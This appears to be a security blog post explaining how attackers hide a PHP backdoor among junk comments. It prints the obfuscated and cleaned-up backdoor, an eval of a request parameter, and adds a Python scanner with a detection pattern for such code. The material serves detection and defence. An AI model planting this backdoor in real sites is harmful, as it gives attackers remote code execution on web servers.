Hackers Attempting To Hide Malicious Code in Files With Comments

When hackers add malicious code to a website’s files they often obfuscate it in some way. A simple method looks like this:

eval(base64_decode(...));

This method isn’t very effective as a disguise: the code sticks out, and it is easy enough to search every file on a website for eval(base64_decode( and the similar functions that get used, find the matching code, and undo the obfuscation to check whether it is malicious. We sometimes see other methods that are more effective, but more often than not the less effective ones are used. One other method that we have been seeing used a lot recently is hiding the code among numerous comments. Because comments are ignored when code is executed, the added clutter only affects someone trying to review the code. Here is one example of malicious code hidden among comments:

/*YbOO*/if/*_U<fJOm8*/(/*7SS}M*/isset/*OaC*/(/*rXOJ3*/$_REQUEST/*C3!*/[/*Ui&*/'j'/*!~Me*/./*-iBU&(*/'g'/*).5\l*/./*nt`jgl*/'k'/*@^j?*/./*\8Mw<^*/'vo'/*N;k|BW*/]/*:s;*//*<@]w~!*/)/*Pd *//*BCEmq*/)/*VgLpn*/eval/*e+Ms!=>*/(/*TDB!*/stripslashes/*^zpWo*/(/*HaLyQ;*/$_REQUEST/*:8L6&Ts*/[/*v>]b5i|*/'j'/*jMe*/./*(J&I8*/'g'/*(MJg:*/./*tj9-*/'k'/*79Y|yO*/./*ylwhw*/'vo'/*AKO'\s*/]/*nSL6}*//*a2I*/)/*%}!3*//*:T6pf@*/)/*4J:T&*//*\YykDeo*/;/*gi-`D*/

It probably looks like a bunch of gibberish to you. But amongst the apparent gibberish is the malicious code, which is every token that sits outside the /* ... */ comments:

/*YbOO*/if/*_U<fJOm8*/(/*7SS}M*/isset/*OaC*/(/*rXOJ3*/$_REQUEST/*C3!*/[/*Ui&*/'j'/*!~Me*/./*-iBU&(*/'g'/*).5\l*/./*nt`jgl*/'k'/*@^j?*/./*\8Mw<^*/'vo'/*N;k|BW*/]/*:s;*//*<@]w~!*/)/*Pd *//*BCEmq*/)/*VgLpn*/eval/*e+Ms!=>*/(/*TDB!*/stripslashes/*^zpWo*/(/*HaLyQ;*/$_REQUEST/*:8L6&Ts*/[/*v>]b5i|*/'j'/*jMe*/./*(J&I8*/'g'/*(MJg:*/./*tj9-*/'k'/*79Y|yO*/./*ylwhw*/'vo'/*AKO'\s*/]/*nSL6}*//*a2I*/)/*%}!3*//*:T6pf@*/)/*4J:T&*//*\YykDeo*/;/*gi-`D*/

When the comments are stripped out you can see the code by itself:

if(isset($_REQUEST['jgkvo']))eval(stripslashes($_REQUEST['jgkvo']));

That code is a simple backdoor: when a request that includes a parameter named “jgkvo” is sent to a web page containing the malicious code, the backdoor executes whatever PHP code that parameter holds.
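The post's point is that a naive text search fails because the comments break up every token, so a scanner has to normalise the file first. The following is an added example, not code from the post or its author: a small Python scanner that strips PHP comments while leaving string literals alone, folds the 'j'.'g'.'k'.'vo' concatenation trick back into one literal, and only then looks for an eval() or assert() fed from a request superglobal. The sample input is the comment-stuffed line quoted above (with the extraction's curly quotes normalised back to straight quotes) plus a constructed benign line; the function names, the regular expressions and the BENIGN sample are my own choices, and the scanner is a hand-rolled approximation of PHP's tokenizer, not a replacement for it.

```python
import re

# Sample input: the comment-stuffed backdoor quoted in the post, with the
# curly quotes that the page extraction introduced normalised to straight quotes.
OBFUSCATED = (
    r"""/*YbOO*/if/*_U<fJOm8*/(/*7SS}M*/isset/*OaC*/(/*rXOJ3*/$_REQUEST/*C3!*/[/*Ui&*/'j'/*!~Me*/./*-iBU&(*/'g'"""
    r"""/*).5\l*/./*nt`jgl*/'k'/*@^j?*/./*\8Mw<^*/'vo'/*N;k|BW*/]/*:s;*//*<@]w~!*/)/*Pd *//*BCEmq*/)/*VgLpn*/eval"""
    r"""/*e+Ms!=>*/(/*TDB!*/stripslashes/*^zpWo*/(/*HaLyQ;*/$_REQUEST/*:8L6&Ts*/[/*v>]b5i|*/'j'/*jMe*/./*(J&I8*/'g'"""
    r"""/*(MJg:*/./*tj9-*/'k'/*79Y|yO*/./*ylwhw*/'vo'/*AKO'\s*/]/*nSL6}*//*a2I*/)/*%}!3*//*:T6pf@*/)/*4J:T&*/"""
    r"""/*\YykDeo*/;/*gi-`D*/"""
)

# Constructed benign sample: a string literal that merely contains "/* ... */"
# must survive intact, while the trailing // and # comments are removed.
BENIGN = "echo 'see /* this */ stays'; // trailing comment\n$a = 1; # hash comment\n"


def strip_php_comments(src: str) -> str:
    """Drop /* ... */, // and # comments from PHP source, keeping string literals intact.

    Hand-rolled scanner (assumption: good enough for triage, not a PHP parser).
    It does not handle heredoc/nowdoc bodies, the ?> terminator of line
    comments, or PHP 8 #[...] attributes.
    """
    out = []
    i, n = 0, len(src)
    while i < n:
        c = src[i]
        if c in ("'", '"'):
            # Copy a quoted literal verbatim, honouring backslash escapes, so a
            # "/*" inside a string is never mistaken for a comment opener.
            j = i + 1
            while j < n and src[j] != c:
                j += 2 if src[j] == "\\" else 1
            out.append(src[i:j + 1])
            i = j + 1
        elif src.startswith("/*", i):
            end = src.find("*/", i + 2)
            i = n if end == -1 else end + 2
        elif src.startswith("//", i) or c == "#":
            end = src.find("\n", i)  # the newline itself is kept
            i = n if end == -1 else end
        else:
            out.append(c)
            i += 1
    return "".join(out)


# Two adjacent single-quoted literals joined by the PHP "." operator.
CONCAT = re.compile(r"'([^'\\]*)'\s*\.\s*'([^'\\]*)'")


def fold_concatenation(code: str) -> str:
    """Join adjacent single-quoted literals ('j'.'g'.'k'.'vo' -> 'jgkvo') until stable."""
    prev = None
    while prev != code:
        prev = code
        code = CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", code)
    return code


def normalize(src: str) -> str:
    """Comment stripping followed by literal folding: the view a reviewer wants."""
    return fold_concatenation(strip_php_comments(src))


# A dynamic-code sink whose argument reaches back to a request superglobal,
# which is the shape of the backdoor shown in the post.
BACKDOOR = re.compile(
    r"\b(eval|assert)\s*\(.*?\$_(REQUEST|GET|POST|COOKIE)\s*\[\s*['\"]?(\w+)['\"]?\s*\]",
    re.DOTALL,
)


def find_request_eval(code: str) -> list:
    """Return (sink, superglobal, parameter) triples for every match in code."""
    return BACKDOOR.findall(code)


if __name__ == "__main__":
    # On the raw file the pattern misses: "eval" and "(" are separated by a comment.
    print("raw source   :", find_request_eval(OBFUSCATED))           # []
    print("normalised   :", normalize(OBFUSCATED))
    print("after cleanup:", find_request_eval(normalize(OBFUSCATED)))  # [('eval', 'REQUEST', 'jgkvo')]
```

Running the scanner on the raw line finds nothing, because the comment between eval and ( defeats the pattern; after normalisation it reports the eval sink fed by $_REQUEST['jgkvo'], matching the comment-free form shown above. In a PHP-based tool the same normalisation is more robustly done with token_get_all(), discarding T_COMMENT and T_DOC_COMMENT tokens, which also copes with the heredoc and attribute cases this scanner skips.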